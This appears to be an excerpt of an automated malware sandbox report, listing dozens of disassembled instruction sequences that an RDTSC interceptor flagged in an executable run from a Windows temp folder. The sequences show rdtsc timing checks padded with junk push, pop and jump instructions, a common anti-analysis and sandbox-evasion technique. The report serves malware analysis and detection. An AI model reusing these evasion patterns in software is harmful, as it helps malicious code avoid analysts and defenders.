                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D65302 second address: D65306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D65306 second address: D6530E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D6530E second address: D65313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D65313 second address: D65324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3430D3497Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD279F second address: DD27A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD27A9 second address: DD27B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD27B2 second address: DD27B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD27B8 second address: DD27C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD27C0 second address: DD27D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jnp 00007F3430D3ED42h 0x0000000d jbe 00007F3430D3ED36h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD27D5 second address: DD27EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F3430D3497Eh 0x0000000b jne 00007F3430D34976h 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD27EF second address: DD27F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD27F3 second address: DD2800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD2AB9 second address: DD2AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD2AC1 second address: DD2AC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD2AC5 second address: DD2AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3430D3ED36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jo 00007F3430D3ED36h 0x00000013 pop edi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD2AE0 second address: DD2AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3430D34983h 0x00000009 popad 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD2C27 second address: DD2C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD2C2B second address: DD2C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3430D34987h 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD2DED second address: DD2DF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD2DF7 second address: DD2E03 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD2E03 second address: DD2E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD98C9 second address: DD98CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D5E673 second address: D5E677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: D5E677 second address: D5E691 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34981h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD8746 second address: DD8750 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3430D3ED36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA8E86 second address: DA8E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA8E8B second address: DA8EB7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3430D3ED3Ch 0x00000008 jc 00007F3430D3ED36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 sub dword ptr [ebp+124591E6h], edx 0x00000019 lea eax, dword ptr [ebp+1248DC91h] 0x0000001f mov ecx, edx 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 jo 00007F3430D3ED3Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA8EB7 second address: DA8EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA8EBB second address: D864B6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3430D3ED3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c jg 00007F3430D3ED38h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 nop 0x00000016 mov edi, 02100031h 0x0000001b call dword ptr [ebp+122D30E3h] 0x00000021 pushad 0x00000022 push esi 0x00000023 jmp 00007F3430D3ED43h 0x00000028 jo 00007F3430D3ED36h 0x0000002e pop esi 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 push esi 0x00000034 pop esi 0x00000035 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA8FD0 second address: DA90A9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3430D34976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F3430D3497Fh 0x00000011 xchg eax, ebx 0x00000012 mov dword ptr [ebp+122D1E13h], eax 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov dword ptr [ebp+122D3103h], esi 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c cmc 0x0000002d mov dword ptr [ebp+1248DCE9h], esp 0x00000033 cmc 0x00000034 adc di, 5421h 0x00000039 cmp dword ptr [ebp+122D3850h], 00000000h 0x00000040 jne 00007F3430D34AAEh 0x00000046 mov cx, 0541h 0x0000004a mov byte ptr [ebp+122D25C6h], 00000047h 0x00000051 push 00000000h 0x00000053 push ecx 0x00000054 call 00007F3430D34978h 0x00000059 pop ecx 0x0000005a mov dword ptr [esp+04h], ecx 0x0000005e add dword ptr [esp+04h], 0000001Ch 0x00000066 inc ecx 0x00000067 push ecx 0x00000068 ret 0x00000069 pop ecx 0x0000006a ret 0x0000006b jng 00007F3430D34986h 0x00000071 jmp 00007F3430D34980h 0x00000076 mov edx, dword ptr [ebp+122D3984h] 0x0000007c mov eax, D49AA7D2h 0x00000081 jmp 00007F3430D34985h 0x00000086 mov edi, 1C266900h 0x0000008b nop 0x0000008c jo 00007F3430D34980h 0x00000092 pushad 0x00000093 jl 00007F3430D34976h 0x00000099 push edi 0x0000009a pop edi 0x0000009b popad 0x0000009c push eax 0x0000009d push eax 0x0000009e push edx 0x0000009f jmp 00007F3430D3497Bh 0x000000a4 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DBADA6 second address: DBADD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3430D3ED3Dh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DBBDF6 second address: DBBDFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DBBDFA second address: DBBE19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA9386 second address: BEECC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jnl 00007F3430D34982h 0x0000000e jns 00007F3430D3497Ch 0x00000014 jbe 00007F3430D34976h 0x0000001a nop 0x0000001b mov di, 506Fh 0x0000001f push dword ptr [ebp+122D02E9h] 0x00000025 mov edi, 50537A0Eh 0x0000002a jmp 00007F3430D34981h 0x0000002f call dword ptr [ebp+122D1DFEh] 0x00000035 pushad 0x00000036 mov dword ptr [ebp+122D2013h], eax 0x0000003c jg 00007F3430D3497Fh 0x00000042 pushad 0x00000043 cmc 0x00000044 add dword ptr [ebp+122D2013h], ecx 0x0000004a popad 0x0000004b xor eax, eax 0x0000004d mov dword ptr [ebp+122D2013h], eax 0x00000053 mov edx, dword ptr [esp+28h] 0x00000057 mov dword ptr [ebp+122D1DE8h], edi 0x0000005d jmp 00007F3430D34989h 0x00000062 mov dword ptr [ebp+122D3838h], eax 0x00000068 mov dword ptr [ebp+122D1E0Dh], ecx 0x0000006e mov esi, 0000003Ch 0x00000073 or dword ptr [ebp+122D1E3Fh], ecx 0x00000079 jp 00007F3430D3498Fh 0x0000007f add esi, dword ptr [esp+24h] 0x00000083 jmp 00007F3430D34981h 0x00000088 lodsw 0x0000008a sub dword ptr [ebp+122D30CDh], edx 0x00000090 add eax, dword ptr [esp+24h] 0x00000094 jmp 00007F3430D34986h 0x00000099 mov ebx, dword ptr [esp+24h] 0x0000009d stc 0x0000009e push eax 0x0000009f push eax 0x000000a0 push edx 0x000000a1 pushad 0x000000a2 jns 00007F3430D34976h 0x000000a8 jo 00007F3430D34976h 0x000000ae popad 0x000000af rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA946D second address: DA9475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA95A1 second address: DA95A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA95A5 second address: DA95B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA95B4 second address: DA95BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA95BA second address: DA95E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F3430D3ED4Eh 0x00000011 jmp 00007F3430D3ED48h 0x00000016 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA95E3 second address: DA95ED instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3430D3497Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA95ED second address: DA9615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jc 00007F3430D3ED42h 0x00000010 jg 00007F3430D3ED3Ch 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a je 00007F3430D3ED38h 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA988D second address: DA98AC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3430D3497Ch 0x00000008 jc 00007F3430D34976h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F3430D3497Ah 0x0000001a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA98AC second address: DA98C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D3ED47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA98C7 second address: DA9903 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3430D34989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3430D34988h 0x00000015 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA9F59 second address: DA9F5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA9F5E second address: DA9F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA9F64 second address: DA9FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d pushad 0x0000000e jmp 00007F3430D3ED42h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 nop 0x00000018 mov edx, dword ptr [ebp+122D39E0h] 0x0000001e push 0000001Eh 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007F3430D3ED38h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a jmp 00007F3430D3ED3Dh 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jno 00007F3430D3ED38h 0x00000048 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA9FC7 second address: DA9FCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DAA12C second address: DAA131 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DAA3F0 second address: DAA3F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DAA3F4 second address: DAA420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a sbb edx, 7AFD5A27h 0x00000010 lea eax, dword ptr [ebp+1248DCD5h] 0x00000016 mov edi, dword ptr [ebp+122D3B68h] 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F3430D3ED3Dh 0x00000024 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DAA420 second address: DAA458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jno 00007F3430D34976h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jnl 00007F3430D34976h 0x00000019 popad 0x0000001a pop edx 0x0000001b nop 0x0000001c mov dword ptr [ebp+122D3012h], ecx 0x00000022 lea eax, dword ptr [ebp+1248DC91h] 0x00000028 and dx, 4D4Eh 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jg 00007F3430D34978h 0x00000036 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD8A28 second address: DD8A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3430D3ED36h 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DA8EC5 second address: D864B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 jg 00007F3430D34978h 0x0000000e pop ecx 0x0000000f nop 0x00000010 mov edi, 02100031h 0x00000015 call dword ptr [ebp+122D30E3h] 0x0000001b pushad 0x0000001c push esi 0x0000001d jmp 00007F3430D34983h 0x00000022 jo 00007F3430D34976h 0x00000028 pop esi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d push esi 0x0000002e pop esi 0x0000002f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD8B8B second address: DD8B95 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3430D3ED36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD8B95 second address: DD8BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3430D3497Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007F3430D34976h 0x00000015 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD8BB0 second address: DD8BB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD8E66 second address: DD8E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3430D34976h 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD8E70 second address: DD8E80 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3430D3ED36h 0x00000008 jns 00007F3430D3ED36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD8E80 second address: DD8EB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F3430D34983h 0x0000000a jmp 00007F3430D34988h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F3430D34976h 0x00000018 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD8EB9 second address: DD8EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007F3430D3ED36h 0x00000014 pop eax 0x00000015 push ebx 0x00000016 jmp 00007F3430D3ED3Ch 0x0000001b push esi 0x0000001c pop esi 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jne 00007F3430D3ED36h 0x00000026 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD91AE second address: DD91B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXERDTSC instruction interceptor: First address: DD91B6 second address: DD91E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3430D3ED3Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3430D3ED3Dh 0x00000014 push esi 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop esi 0x00000018 rdtsc
